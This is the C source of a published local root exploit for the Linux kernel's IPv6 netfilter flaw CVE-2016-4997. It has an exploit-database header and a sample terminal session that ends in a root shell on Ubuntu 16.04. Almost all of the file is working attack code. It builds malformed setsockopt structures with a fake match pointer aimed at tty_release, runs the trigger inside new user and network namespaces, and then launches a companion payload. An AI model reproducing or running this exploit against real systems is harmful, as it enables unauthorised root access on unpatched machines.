/*
# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
# Date: 2016.10.8
# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
# Version: Linux kernel <= 4.6.2
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
# CVE: CVE-2016-4997
# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
# Contact: tyrande000@gmail.com

#DESCRIPTION
#===========
#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.

zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
compile.sh  enjoy  enjoy.c  pwn  pwn.c  version.h
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
[sudo] password for zhang_q: 
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn 
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
got root, enjoy :)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl 
   Static hostname: ubuntu
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 355cdf4ce8a048288640c2aa933c018f
    Virtualization: vmware
  Operating System: Ubuntu 16.04.1 LTS
            Kernel: Linux 4.4.0-21-generic
      Architecture: x86-64
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <linux/sched.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv6/ip6_tables.h>
#include <errno.h>
#include "version.h"

typedef unsigned char		u8;
typedef unsigned short		u16;
typedef unsigned int		u32;
typedef unsigned long long	u64;

typedef u32					compat_uptr_t;
typedef u32					compat_uint_t;

#define IP6T_BASE_CTL			64

#define IP6T_SO_SET_REPLACE		(IP6T_BASE_CTL)
#define IP6T_SO_SET_ADD_COUNTERS	(IP6T_BASE_CTL + 1)

#define __X32_SYSCALL_BIT 0x40000000
#define __NR_setsockopt (__X32_SYSCALL_BIT + 541)

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

struct compat_xt_counters {
	u64 pcnt, bcnt;			/* Packet and byte counters */
};

struct compat_ip6t_entry {
	struct ip6t_ip6				ipv6;
	compat_uint_t				nfcache;
	u16							target_offset;
	u16							next_offset;
	compat_uint_t				comefrom;
	struct compat_xt_counters	counters;
	unsigned char				elems[0];
};

struct compat_ip6t_replace {
	char						name[XT_TABLE_MAXNAMELEN];
	u32							valid_hooks;
	u32							num_entries;
	u32							size;
	u32							hook_entry[NF_INET_NUMHOOKS];
	u32							underflow[NF_INET_NUMHOOKS];
	u32							num_counters;
	compat_uptr_t				counters;	/* struct xt_counters * */
	struct compat_ip6t_entry	entries[0];
};

struct compat_xt_entry_target {
	union {
		struct {
			u_int16_t target_size;
			char name[XT_FUNCTION_MAXNAMELEN - 1];
			u_int8_t revision;
		} user;
		struct {
			u_int16_t target_size;
			compat_uptr_t target;
		} kernel;
		u_int16_t target_size;
	} u;
	unsigned char data[0];
};

int pwn(void *p)
{
	int							sockfd;
	void						*data;
	struct compat_ip6t_replace	*tmp;
	struct compat_ip6t_entry	*entry;
	struct xt_entry_match		*ematch;
	struct xt_entry_target		*target;
	char						*fake_xt_match;
	long long					fake_module;
	int							i;
	
	printf("pwn begin, let the bullets fly . . .\n");
	printf("and wait for a minute . . .\n");
	
	data = malloc(0x5000);
	fake_xt_match = malloc(0x100);
	
	memset(data, 0x0, 0x5000);
	memset(fake_xt_match, 0x0, 0x100);
	
	//002A5 mov     rax, [rbx+8]
	//002A9 mov     rdi, [rax+58h]
	//002AD call    module_put
	fake_module = (PTMX_FOPS + FOPS_RELEASE_OFFSET - 0x340 + 0x5);//pointer to tty_release + 5
	*(long long *)(fake_xt_match + 0x58) = fake_module;
	
	if((sockfd = socket(AF_INET6, SOCK_STREAM, 0)) < 0){      // IPv6
		perror("Socket");
		exit(errno);
	}
	
	tmp = (struct compat_ip6t_replace *)data;
	tmp->num_counters = 0xff;
	tmp->num_entries = 0xff;//whatever but > 0
	tmp->size = /*entry->next_offset*/0xff + 0xffff;
	
	entry = (struct compat_ip6t_entry *)(data + sizeof(struct compat_ip6t_replace));
	entry->target_offset = 0x8c - sizeof(u16) - 0x1 - 0xb;//this field must < 0xa4
	entry->next_offset = sizeof(struct compat_ip6t_entry) + sizeof(struct compat_xt_entry_target) + 1;//0xc4 + 1
	*(long *)((char *)entry + 0xffff + 0x8) = (long)fake_xt_match;;
	
	ematch = (struct xt_entry_match *)(data + sizeof(struct compat_ip6t_replace) + sizeof(struct compat_ip6t_entry));
	ematch->u.match_size = 0xffff;
	*(long *)((char *)ematch + 0x8) = (long)fake_xt_match;
	
	target = (struct xt_entry_target *)(data + sizeof(struct compat_ip6t_replace) + entry->target_offset);
	
	//bypass xt_request_find_target()
	memset(target->u.user.name, 0x0, 1);
	target->u.user.revision = 0x0;
	
	for(i = 0;i < (0x1000000 / 2);++i){
		//let's do something interest
		//syscall(__NR_setsockopt, sockfd, SOL_IPV6, IP6T_SO_SET_REPLACE, data, optlen);
		if(setsockopt(sockfd, SOL_IPV6, IP6T_SO_SET_REPLACE, data, i) == -1){
			if(errno == ENOPROTOOPT){
				printf("no ip6_tables.ko in kernel!\n");
				exit(errno);
			}
		}
	}
	
	return 0;
}

int main(int argc, char **argv)
{
	void	*stack;
	pid_t	pid;
	int		status;
	
	stack = (void *) malloc(65536);
	
	if (stack == NULL) {
		perror("malloc");
		return -1;
	}
	
	if(clone(pwn, stack + 65536, CLONE_NEWUSER | CLONE_NEWNET | SIGCHLD, NULL) == -1){
		printf("clone failed\n");
		exit(0);
	}
	
	pid = waitpid(-1, &status, 0);
	
	if(pid == -1){
		printf("waitpid failed\n");
		exit(0);
	}
	
	if(WEXITSTATUS(status) == 0){
		printf("pwn over, let's enjoy!\n");
		execl("./enjoy", "", NULL);
	}else{
		printf("something goes wrong\n");
	}
	
	return 0;
}

